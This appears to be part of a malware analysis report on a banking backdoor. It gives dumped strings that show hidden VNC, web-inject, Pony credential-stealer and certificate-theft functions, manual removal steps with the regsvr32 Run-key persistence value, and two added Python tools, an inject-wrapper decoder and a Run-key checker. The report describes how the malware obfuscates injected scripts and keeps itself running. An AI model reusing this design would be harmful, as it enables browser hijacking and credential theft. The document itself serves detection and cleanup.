%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
O.PRF*
%XkOS
7%7.777@7
1#1-161@1|1
.pdata
@.reloc
@8.tW
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll

sppsvc.exe_3244_rwx_00800000_00055000:

(string set identical to the SearchIndexer.exe_2228_rwx_03350000_00055000 region above; not repeated)


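The eval()/XOR wrapper and the EQFramework object in the dumped strings show how the web inject is delivered: the injected script is XORed with a one-byte key, handed to eval() at run time, and the decoded code then talks to the in-browser hook through URLs of the form /<key>/<random>/<command>/... (commands 1 to 16 above, replies "-" for failure and "+" for success). What follows is an added example written for this page in Python; it is not code from the sample, the analysis system, or the page author. It decodes a wrapper of that shape and pulls the framework key out of the result. Two things are assumptions: that the page extraction dropped the '+' characters from the format strings (the template in the docstring has them restored), and that the counter incremented inside the loop body is the key, giving a rolling single-byte XOR; the decoder checks which variable is incremented and falls back to a fixed key otherwise. All sample input is constructed.

```python
r"""Decoder for the eval()/XOR wrapper whose format strings appear in the
dumped regions above.  Added example for this page, not code from the
sample or from the analysis system.

With the '+' characters the page extraction dropped put back, the wrapper
template reads (variable names are random '_x<hex>' tokens and 0x<key>
is filled in by the injector):

    eval((function(K){var O='';var S="<payload>";
         for (var I=0;I<S.length;I++)
         {O+=String.fromCharCode(S.charCodeAt(I)^(K&0xFF));
         K++;}return O;})(0x<key>));

Only the low byte of the key is used.  Reading the counter inside the loop
body as the key (K++) gives a rolling single-byte XOR; decode_wrapper()
checks whether the function parameter is the incremented one and uses a
fixed key when it is not.
"""
import re

_SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f",
                   "v": "\v", "0": "\0", "\\": "\\", '"': '"', "'": "'"}

# Captures the key parameter, the output/payload variable names, the quoted
# payload (JS escapes intact), the loop body and the numeric key.
_WRAPPER_RE = re.compile(
    r"eval\(\(function\((?P<k>_x[0-9A-Fa-f]+)\)\{"
    r"var (?P<o>_x[0-9A-Fa-f]+)='';"
    r"var (?P<s>_x[0-9A-Fa-f]+)=\"(?P<payload>(?:[^\"\\]|\\.)*)\";"
    r"(?P<body>.*?)return (?P=o);\}\)\((?P<key>0x[0-9A-Fa-f]+)\)\);",
    re.S)
# The injector prepends "<obj>.Key = '<key>';" to the framework object.
_KEY_RE = re.compile(r"\.Key\s*=\s*'([^']*)'")


def js_unescape(body):
    """Undo the escapes a double-quoted JS string literal can carry."""
    out, i = [], 0
    while i < len(body):
        ch = body[i]
        if ch != "\\":
            out.append(ch)
            i += 1
        elif body[i + 1] == "x":
            out.append(chr(int(body[i + 2:i + 4], 16)))
            i += 4
        elif body[i + 1] == "u":
            out.append(chr(int(body[i + 2:i + 6], 16)))
            i += 6
        else:
            out.append(_SIMPLE_ESCAPES.get(body[i + 1], body[i + 1]))
            i += 2
    return "".join(out)


def js_escape(text):
    r"""Inverse of js_unescape: non-printables become \xHH, code units
    above 0xFF become \uHHHH, quotes and backslashes are escaped."""
    out = []
    for ch in text:
        code = ord(ch)
        if ch in '"\\':
            out.append("\\" + ch)
        elif 0x20 <= code < 0x7F:
            out.append(ch)
        elif code < 0x100:
            out.append("\\x%02x" % code)
        else:
            out.append("\\u%04x" % code)
    return "".join(out)


def xor_stream(text, key, rolling):
    """XOR each UTF-16 code unit with the key's low byte, advancing the key
    once per character when rolling (mirrors the wrapper's loop)."""
    return "".join(chr(ord(c) ^ ((key + (i if rolling else 0)) & 0xFF))
                   for i, c in enumerate(text))


def decode_wrapper(wrapped):
    """Return the plaintext script inside a wrapper, or None when the text
    does not have the wrapper's shape."""
    m = _WRAPPER_RE.search(wrapped)
    if m is None:
        return None
    rolling = (m.group("k") + "++;") in m.group("body")
    return xor_stream(js_unescape(m.group("payload")),
                      int(m.group("key"), 16), rolling)


def extract_framework_key(script):
    """Per-victim key from the "<obj>.Key = '<key>';" line, if present."""
    m = _KEY_RE.search(script)
    return m.group(1) if m else None


def wrap_script(script, key, rolling=True, tag="7c3"):
    """Build a wrapper of the same shape.  Used only to produce inputs for
    this example; the real one is filled in by the sample's native code."""
    k, o, s, i = ("_x%s%d" % (tag, n) for n in range(4))
    step = (k + "++;") if rolling else ""
    return ("eval((function(%s){var %s='';var %s=\"%s\";"
            "for (var %s=0;%s<%s.length;%s++)"
            "{%s+=String.fromCharCode(%s.charCodeAt(%s)^(%s&0xFF));"
            "%s}return %s;})(0x%x));"
            % (k, o, s, js_escape(xor_stream(script, key, rolling)),
               i, i, s, i, o, s, i, k, step, o, key))


# Constructed sample: "alert(1)" hand-encoded with key 0x10, rolling.
SAMPLE_WRAPPED = ("eval((function(_x1){var _x2='';var _x3=\"q}wa`='>\";"
                  "for (var _x4=0;_x4<_x3.length;_x4++)"
                  "{_x2+=String.fromCharCode(_x3.charCodeAt(_x4)^(_x1&0xFF));"
                  "_x1++;}return _x2;})(0x10));")

if __name__ == "__main__":
    print(decode_wrapper(SAMPLE_WRAPPED))
    inject = wrap_script("var q7 = new function(){};q7.Key = 'abcd';", 0x5e)
    print(extract_framework_key(decode_wrapper(inject)))
```

Run it on the text of a page captured from an infected browser (or on strings pulled from a dump); a wrapper that decodes to an object built with EQFramework and a `.Key = '...'` line is the inject, and the key is what the bot uses to recognise its own /<key>/... requests.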
Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    regsvr32.exe:1796

  3. Delete the original Backdoor file.
  4. Delete or disinfect the following files created/modified by the Backdoor:

    C:\ProgramData\LibxaJximb\QamzEsom.ijv (1425 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "LibxaJximb" = "regsvr32.exe C:\ProgramData\LibxaJximb\QamzEsom.ijv"

  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
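The manual steps above come down to stopping the regsvr32.exe host, deleting the dropped .ijv file and removing the Run value that relaunches it; the persistence itself is the `regsvr32.exe "%s"` / `regsvr32.exe /s /i:"%u" "%s"` command written under the Run key named in the strings. Below is an added check written for this page in Python (not code from the sample, the analysis system, or the page author) that finds Run entries of that kind: on Windows it reads the live HKCU and HKLM Run keys with winreg, elsewhere it runs over entries you hand it, for instance parsed from a .reg export or an offline hive. The sample entries are constructed, and the two rules it applies (regsvr32 loading a file without a library extension, or a file from a user-writable directory) are this example's own heuristic, not something the report states.

```python
r"""Check Run-key autostart values for the regsvr32.exe persistence the
removal steps above deal with.  Added example for this page, not code
from the sample or from the analysis system.

The report's autorun value is
    regsvr32.exe C:\ProgramData\LibxaJximb\QamzEsom.ijv
and the dumped strings carry the templates regsvr32.exe "%s" and
regsvr32.exe /s /i:"%u" "%s".  A legitimate Run entry rarely asks
regsvr32 to load a file with a non-library extension, or anything out of
ProgramData, AppData or Users, so those two conditions are flagged (this
example's own heuristic).  On Windows the live HKCU and HKLM keys are
read with winreg; elsewhere the check runs over entries handed to it.
"""
import shlex
import sys

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
LIBRARY_EXTS = {".dll", ".ocx", ".ax", ".cpl"}
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\users\\", "\\temp\\")


def split_command(command):
    """Tokenise a Run-key command line: split on whitespace, keep quoted
    spans together, then drop the quotes themselves."""
    try:
        tokens = shlex.split(command, posix=False)
    except ValueError:          # unbalanced quote in the value
        tokens = command.split()
    return [t.replace('"', "") for t in tokens]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def suspicious_run_entries(entries):
    """entries: iterable of (hive, value_name, command).  Returns findings
    for commands where regsvr32.exe loads a non-library file or a file
    from a user-writable directory."""
    findings = []
    for hive, name, command in entries:
        tokens = split_command(command)
        if not tokens or _basename(tokens[0]).lower() != "regsvr32.exe":
            continue
        # regsvr32 switches start with '/'; the module path is the rest.
        targets = [t for t in tokens[1:] if not t.startswith("/")]
        if not targets:
            continue
        target = targets[-1]
        lowered = target.lower().replace("/", "\\")
        base = _basename(lowered)
        ext = ("." + base.rsplit(".", 1)[1]) if "." in base else ""
        reasons = []
        if ext not in LIBRARY_EXTS:
            reasons.append("non-library extension %r" % ext)
        if any(root in lowered for root in USER_WRITABLE):
            reasons.append("target in a user-writable directory")
        if reasons:
            findings.append({"hive": hive, "name": name, "command": command,
                             "target": target, "reasons": reasons})
    return findings


def enumerate_run_values():
    """Read the live Run keys.  Windows only; returns [] elsewhere."""
    if sys.platform != "win32":
        return []
    import winreg
    entries = []
    for hive_name, hive in (("HKCU", winreg.HKEY_CURRENT_USER),
                            ("HKLM", winreg.HKEY_LOCAL_MACHINE)):
        try:
            key = winreg.OpenKey(hive, RUN_KEY)
        except OSError:
            continue
        with key:
            index = 0
            while True:
                try:
                    value_name, data, _ = winreg.EnumValue(key, index)
                except OSError:       # no more values under this key
                    break
                entries.append((hive_name, value_name, str(data)))
                index += 1
    return entries


# Constructed sample entries; the first mirrors the report's autorun value.
SAMPLE_ENTRIES = [
    ("HKCU", "LibxaJximb",
     r"regsvr32.exe C:\ProgramData\LibxaJximb\QamzEsom.ijv"),
    ("HKCU", "OneDrive",
     r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("HKLM", "VendorHelper",
     r'regsvr32.exe /s "C:\Program Files\Vendor\helper.dll"'),
    ("HKCU", "Updater",
     r'regsvr32.exe /s /i:"41" "C:\Users\u\AppData\Roaming\xa\b.tmp"'),
]

if __name__ == "__main__":
    entries = enumerate_run_values() or SAMPLE_ENTRIES
    for f in suspicious_run_entries(entries):
        print("%s\\...\\Run\\%s -> %s (%s)"
              % (f["hive"], f["name"], f["target"], "; ".join(f["reasons"])))
```

A hit from this check is a lead, not a verdict: confirm the target file (hash it against the MD5/SHA256 at the top of this page) and the regsvr32.exe process tree before deleting the value, and repeat the check after the reboot in step 6, since the bot rewrites its Run value while it is alive.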
